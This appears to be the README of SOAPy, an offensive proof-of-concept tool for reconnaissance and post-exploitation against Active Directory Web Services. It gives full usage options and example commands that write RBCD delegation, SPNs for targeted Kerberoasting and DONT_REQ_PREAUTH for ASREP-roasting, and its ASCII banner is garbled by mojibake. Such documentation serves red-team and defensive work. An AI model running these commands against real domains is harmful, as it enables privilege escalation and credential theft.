SOAPy is a Proof of Concept (PoC) tool for conducting offensive interaction with Active Directory Web Services (ADWS) from Linux hosts. SOAPy includes previously undeveloped custom python implementations of a collection of Microsoft protocols required for interaction with the ADWS service. This includes but is not limited to: NNS (.NET NegotiateStream Protocol), NMF (.NET Message Framing Protocol), and NBFSE (.NET Binary Format: SOAP Extension).
SOAPy can be primarily utilized to interact with ADWS for stealthy recon over a proxy into an internal Active Directory environment. Additionally SoaPy can perform targeted DACL-focused post-exploitation over ADWS, including servicePrincipalName writing for targeted Kerberoasting, DONβT_REQ_PREAUTH writing for targeted ASREP-Roasting, and the ability to write to msDs-AllowedToActOnBehalfOfOtherIdentity for Resource-Based Constrained Delegation attacks.
The protocol structure for interacting with ADWS is shown below:
The blog detailing the original research largely from an engineering perspective can be found here
ββββββββ βββββββ ββββββ βββββββ βββ βββ
βββββββββββββββββββββββββββββββββββββ ββββ
βββββββββββ βββββββββββββββββββ βββββββ
βββββββββββ ββββββββββββββββββ βββββ
ββββββββββββββββββββ ββββββ βββ
ββββββββ βββββββ βββ ββββββ βββ
@_logangoins
github.com/jlevere
usage: soapy [-h] [--debug] [--ts] [-H nthash] [--users] [--computers]
[--groups] [--constrained] [--unconstrained] [--spns]
[--asreproastable] [--admins] [--rbcds] [-q query]
[-f attr,attr,...] [-dn distinguishedname] [-p] [--rbcd source]
[--spn value] [--asrep] [--account account] [--remove]
[--addcomputer [MACHINE]] [--computer-pass pass] [--ou ou]
[--delete-computer MACHINE] [--disable-account MACHINE]
[--dns-add FQDN] [--dns-modify FQDN] [--dns-remove FQDN]
[--dns-tombstone FQDN] [--dns-resurrect FQDN] [--dns-ip IP]
[--ldapdelete] [--allow-multiple] [--ttl TTL] [--tcp]
connection
Perform AD reconnaissance and post-exploitation through ADWS from Linux
positional arguments:
connection domain/username[:password]@<targetName or address>
options:
-h, --help show this help message and exit
--debug Turn DEBUG output ON
--ts Adds timestamp to every logging output.
-H nthash, --hash nthash
Use an NT hash for authentication
Enumeration:
--users Enumerate user objects
--computers Enumerate computer objects
--groups Enumerate group objects
--constrained Enumerate objects with msds-allowedtodelegateto
--unconstrained Enumerate objects with TRUSTED_FOR_DELEGATION
--spns Enumerate accounts with servicePrincipalName set
--asreproastable Enumerate accounts with DONT_REQ_PREAUTH set
--admins Enumerate high privilege accounts
--rbcds Enumerate accounts with msDs-
AllowedToActOnBehalfOfOtherIdentity set
-q query, --query query
Raw query to execute on the target
-f attr,attr,..., --filter attr,attr,...
Attributes to select, comma separated
-dn distinguishedname, --distinguishedname distinguishedname
The root object's distinguishedName for the query
-p, --parse Parse attributes to human readable format
Writing:
--rbcd source Write/remove RBCD (source computer)
--spn value Write servicePrincipalName value (use --remove to
delete)
--asrep Write DONT_REQ_PREAUTH flag (asrep roastable)
--account account Account to perform operations on
--remove Remove attribute value based on operation
--addcomputer [MACHINE]
Create a computer account in AD (optional MACHINE
name)
--computer-pass pass Password for the new computer account (optional).
--ou ou DN of the OU where to create the computer (optional).
--delete-computer MACHINE
Delete an existing computer account
--disable-account MACHINE
Disable a computer account (set AccountDisabled)
--dns-add FQDN Add A record (FQDN). Requires --dns-ip
--dns-modify FQDN Modify/replace A record (FQDN). Requires --dns-ip
--dns-remove FQDN Remove A record (FQDN). Requires --dns-ip unless
--ldapdelete
--dns-tombstone FQDN Tombstone a dnsNode (replace with TS record + set
dNSTombstoned=true)
--dns-resurrect FQDN Resurrect a tombstoned dnsNode
--dns-ip IP IP used with dns add/modify/remove
--ldapdelete Use delete on dnsNode object (when used with --dns-
remove)
--allow-multiple Allow multiple A records when adding
--ttl TTL TTL for new A record (default 180)
--tcp Use DNS over TCP when fetching SOA serial
With pipx:
pipx install .
With poetry:
poetry install
Enumerate users using preset enumeration flags:
soapy <domain>/<user>:'<password>'@<ip> --users
Enumerate computers samAccountName and objectSid using a custom query/attribute filtering:
soapy <domain>/<user>:'<password>'@<ip> --query '(objectClass=computer)' --filter "samaccountname,objectsid"
Write msDs-AllowedToActOnBehalfOfOtherIdentity on DC01, enabling delegation from MS01 for an RBCD attack:
soapy <domain>/<user>:'<password>'@<ip> --rbcd 'MS01$' --account 'DC01$'
Write the servicePrincipalName attribute on jdoe as part of a targeted Kerberoasting attack:
soapy <domain>/<user>:'<password>'@<ip> --spn test/spn --account jdoe
Write DONT_REQ_PREAUTH (0x400000) on jdoe's userAccountControl attribute, making the account ASREP-Roastable:
soapy <domain>/<user>:'<password>'@<ip> --asrep --account jdoe